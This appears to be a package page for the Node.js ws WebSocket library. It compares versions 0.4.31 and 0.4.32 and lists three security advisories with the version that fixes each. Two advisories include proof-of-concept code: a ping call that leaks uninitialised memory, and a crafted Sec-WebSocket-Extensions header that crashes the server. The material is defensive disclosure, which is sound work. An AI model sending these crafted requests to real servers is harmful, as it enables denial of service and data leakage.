The ws package, a popular choice for WebSocket communication in Node.js, saw an update with version 0.4.32 following version 0.4.31. Both versions aim to provide a simple, fast, and tested solution for WebSocket client, server, and console applications, adhering to RFC-6455. A key difference lies in the dependencies: version 0.4.32 upgrades the "nan" dependency to "~1.0.0" while version 0.4.31 uses "~0.3.0" which is interesting since nan is a native abstraction layer used to support multiple versions of Node.js. Also, "commander" dependency is upgraded from "~0.6.1" to "~2.1.0". Both versions share the same core principles championed by author Einar Otto Stangvik. Developers relying on ws should note these dependency updates, particularly the nan upgrade, as it might impact compatibility with older Node.js versions or native modules depending on earlier nan interfaces. The release dates also highlight a considerable gap of almost a year between the two versions, suggesting other potential minor improvements or bug fixes that aren't explicitly documented in the metadata provided. If you want to upgrade consider also the impact on performance and compatibility with other libraries. Check release notes if available. Both versions include same devDependencies.
All the vulnerabilities related to the version 0.4.32 of the package
Remote Memory Disclosure in ws
Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')
client.on('open', function () {
console.log('open')
client.ping(50) // this sends a non-zeroed buffer of 50 bytes
client.on('pong', function (data) {
console.log('got pong')
console.log(data) // Data from the client.
})
})
Update to version 1.0.1 or greater.
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Update to version 3.3.1 or later.